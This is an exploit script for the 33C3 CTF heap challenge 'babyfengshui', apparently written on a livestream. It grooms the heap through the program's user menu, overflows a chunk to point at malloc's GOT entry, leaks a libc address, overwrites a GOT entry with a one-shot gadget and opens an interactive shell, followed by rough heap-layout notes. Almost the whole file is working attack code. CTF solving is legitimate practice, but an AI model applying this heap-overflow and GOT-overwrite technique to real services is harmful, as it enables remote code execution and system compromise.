33c3 ctf babyfengshui (pwn 150)

babyfengshui.py

import socket
import telnetlib
import struct

"""
developed on stream: https://www.youtube.com/watch?v=zWgS6fTw4Ts
"""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 2323))
s.settimeout(0.1)

def recv_all():
	out = ''
	while True:
		try:
			out += s.recv(1)
		except socket.timeout:
			return out

print recv_all()

print "USER 1 created"
s.send("0\n")
s.send("16\n")
s.send("AAAA\n")
s.send("8\n")
s.send("AAAA\n")

print "USER 2 created"
s.send("0\n")
s.send("16\n")
s.send("BBBB\n")
s.send("8\n")
s.send("BBBB\n")

print "USER 1 delted"
s.send("1\n")
s.send("0\n")

print "USER 3 created"
s.send("0\n")
s.send("32\n")
s.send("CCCC\n")
s.send("8\n")
s.send("CCCC\n")

print "USER 3 edited"
s.send("3\n")
s.send("2\n")
s.send("180\n")

MALLOC_GOT = 0x804b020
MALLOC_OFFSET = 0x76830
s.send("D"*160+struct.pack("I", MALLOC_GOT)+"\n")

print "USER 2 display"
s.send("2\n")
recv_all()
s.send("1\n")
leak = recv_all()
MALLOC_LIBC = struct.unpack("I", leak[20:24])[0]

print "leaked malloc(): 0x{:08x}".format(MALLOC_LIBC)
LIBC_BASE = MALLOC_LIBC - MALLOC_OFFSET
print "calculated libc base: 0x{:08x}".format(LIBC_BASE)



print "USER 3 edited"
s.send("3\n")
s.send("2\n")
s.send("180\n")

MALLOC_GOT = 0x804b020
MALLOC_OFFSET = 0x65683
s.send("D"*160+struct.pack("I", MALLOC_GOT+4)+"\n")

raw_input()
print "USER 2 edited"
s.send("3\n")
s.send("1\n")
s.send("4\n")
ONESHOT = LIBC_BASE + 0x0401B3

s.send(struct.pack("I", ONESHOT)+"\n")

t = telnetlib.Telnet()
t.sock = s
t.interact()

"""
0: new user malloc(our_size)
-> text:

malloc(0x80)
-> name:


[chunk size we control]

[chunk2 size we control]
[0x80 user2 chunk | chunk2 we control]

[0x80 user chunk | chunk we control]





[chunk3..
...]
[chunk2]
[user2]
[user3]

"""